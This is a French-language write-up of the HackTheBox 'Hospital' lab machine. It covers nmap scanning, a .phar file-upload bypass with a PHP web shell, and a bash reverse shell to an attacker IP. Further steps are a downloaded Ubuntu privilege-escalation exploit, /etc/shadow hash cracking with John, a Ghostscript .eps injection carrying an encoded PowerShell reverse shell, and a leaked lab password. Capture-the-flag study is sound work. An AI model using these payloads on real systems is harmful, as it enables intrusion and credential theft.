Hospital HackTheBox (Writeup)

Skills:

Web Enumeration
Abusing file_uploads outil p0wny-shell
Cracking Protected Hash Password
File command injection type .eps
Domain-Privilege-Escalation

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap : Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap :

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.241 -oG allPorts

Analyse des ports ouverts avec extractport : Utilisation de la fonction extractport pour afficher de manière synthétique les ports ouverts et les copier dans le presse-papiers.

Scan de la version des ports avec Nmap : Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,53,88,135,139,389,443,445,464,593,636,1801,2103,2105,2107,2179,3268,3269,3389,5985,6059,6404,6406,6407,6410,6617,6639,8080,9389 10.10.11.241 -oN targeted

Identification de l'Interface du Port 443

Identification de l'Interface du Port 8080

Création d'Utilisateur:

Création d'un utilisateur pour établir un accès potentiel à la machine cible

Vulnérabilité File Upload:

Exploitation initiale:

Tentative d'exploiter une vulnérabilité de téléchargement de fichiers en insérant un fichier PHP malveillant

<?php
system($_GET['cmd'];
?>

Le serveur refuse automatiquement les requêtes d'upload de fichiers possédant certaines extensions.

Interception avec BurpSuite:

Utilisation de BurpSuite pour intercepter et analyser le trafic afin de comprendre les erreurs d'exploitation

Modification de l'extension PHP :

Modifier l'extension du fichier de .php à .phar dans la variable filename, et vous assurer que l'emplacement est accepté avec succès

Enumeration de Répertoires:

Utilisation de Gobuster pour identifier les répertoires sur un serveur web et localiser le stockage des images médicales uploadées.

gobuster dir -u http://10.10.11.241:8080/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20

Fichier non interpreter:

Le contenu d'un fichier .phar n'est pas interprété.

Utilisation d'Outil GitHub pour Créer une Shell:

Utilisation d'un outil provenant d'un projet GitHub pour contourner les restrictions de téléchargement de fichiers PHP et obtenir un accès shell

GitHub - flozz/p0wny-shell: Single-file PHP shellGitHub

Lancement d'une Reverse Shell:

/usr/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.18/444 0>&1'

Exécution d'une reverse shell pour établir un accès interactif à la machine cible et obtenir un contrôle total.

Une fois que vous avez accès au serveur Linux, voici les commandes à effectuer pour le traitement en terminal :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Surmonter les privileges (serveur Linux):

Identification de la version du système d'exploitation : Utiliser la commande cat /etc/os-release pour vérifier la version du système, noter la présence d'une ancienne version d'Ubuntu ("23.04").

Téléchargement du script pour lever les privilèges:

Télécharger le script depuis github qui permet de lever les privilèges :

wget https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh

Extraction des mots de passe hashés : Extraire les mots de passe hashés du fichier `/etc/shadow`.

Crackage des mots de passe :

Utiliser l'outil John the Ripper avec une liste de mots de passe connue pour cracker les mots de passe :

john -w:/usr/share/wordlists/rockyou.txt hash.txt

Vulnérabilité : Injection de fichiers .eps

Tester les informations d'identification sur le site accessible via le port 443.

Découverte d'une boîte mail restreinte :

Découvrir une boîte mail qui veut recevoir un design au format .eps.

Exploitation de Ghostscript via un fichier .eps :

Utilisation d'un exploit GitHub basé sur ghostscript pour exécuter du code malveillant via une extension de fichier .eps.

Utilisation de RevShells pour créer le payload PowerShell :

Injection du payload dans le fichier .eps :

Utilisation de la commande pour injecter le payload avec la reverse shell dans le fichier .eps.

python3 exploit.py --inject --payload "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" --filename file.eps

Mise en écoute avec rlwrap:

Configuration de la mise en écoute avec rlwrap pour attendre une connexion entrante.

rlwrap nc -nlvp 4444

Envoi du mail avec le fichier EPS malveillant :

Découverte d'un fichier ghostscript.bat:

Découverte d'un fichier ghostscript.bat contenant le mot de passe de "drbrown" : chr!$br0wn

Première flag user.txt:

Découverte et récupération de la première flag user.txt.

Élévation de privilèges Active Directory :

Élévation de privilèges en se dirigeant vers le serveur web XAMPP.

Création d'un fichier PHP :

Création d'un fichier PHP contenant le code "this is a test".

echo "this is a test" > test.php

Vérification du fonctionnement du serveur web :

Vérification que le serveur web insère correctement le fichier PHP.

Réinjection du fichier PHP du projet p0wny-shell :

GitHub - flozz/p0wny-shell: Single-file PHP shellGitHub

python3 -m http.server 8080

wget http://10.10.16.2:8080/shell.php -o shell.php

Copie du payload revershell dans le terminal pownyshell :

Mise en écoute avec rlwrap:

rlwrap nc -nlvp 4444

Obtention de la flag root.txt :

Mis à jour il y a 1 an

hashtagReconnaissance:

hashtagVulnérabilité File Upload:

hashtagExploitation initiale:

hashtagModification de l'extension PHP :

hashtagFichier non interpreter:

hashtagUne fois que vous avez accès au serveur Linux, voici les commandes à effectuer pour le traitement en terminal :

hashtagSurmonter les privileges (serveur Linux):

hashtagTéléchargement du script pour lever les privilèges:

hashtagExtraction des mots de passe hashés : Extraire les mots de passe hashés du fichier /etc/shadow.

hashtagVulnérabilité : Injection de fichiers .eps

hashtagTester les informations d'identification sur le site accessible via le port 443.

hashtagUtilisation de RevShells arrow-up-rightpour créer le payload PowerShell :

hashtagInjection du payload dans le fichier .eps :

hashtagMise en écoute avec rlwrap:

hashtagEnvoi du mail avec le fichier EPS malveillant :

hashtagDécouverte d'un fichier ghostscript.bat:

hashtagPremière flag user.txt:

hashtagÉlévation de privilèges Active Directory :

hashtagÉlévation de privilèges en se dirigeant vers le serveur web XAMPP.

hashtagCréation d'un fichier PHP :

hashtagVérification du fonctionnement du serveur web :

hashtagRéinjection du fichier PHP du projet p0wny-shellarrow-up-right :

hashtagCopie du payload revershell dans le terminal pownyshell :

hashtagMise en écoute avec rlwrap:

hashtagObtention de la flag root.txt :

Reconnaissance:

Vulnérabilité File Upload:

Exploitation initiale:

Modification de l'extension PHP :

Fichier non interpreter:

Une fois que vous avez accès au serveur Linux, voici les commandes à effectuer pour le traitement en terminal :

Surmonter les privileges (serveur Linux):

Téléchargement du script pour lever les privilèges:

Extraction des mots de passe hashés : Extraire les mots de passe hashés du fichier `/etc/shadow`.

Vulnérabilité : Injection de fichiers .eps

Tester les informations d'identification sur le site accessible via le port 443.

Utilisation de RevShells pour créer le payload PowerShell :

Injection du payload dans le fichier .eps :

Mise en écoute avec rlwrap:

Envoi du mail avec le fichier EPS malveillant :

Découverte d'un fichier ghostscript.bat:

Première flag user.txt:

Élévation de privilèges Active Directory :

Élévation de privilèges en se dirigeant vers le serveur web XAMPP.

Création d'un fichier PHP :

Vérification du fonctionnement du serveur web :

Réinjection du fichier PHP du projet p0wny-shell :

Copie du payload revershell dans le terminal pownyshell :

Mise en écoute avec rlwrap:

Obtention de la flag root.txt :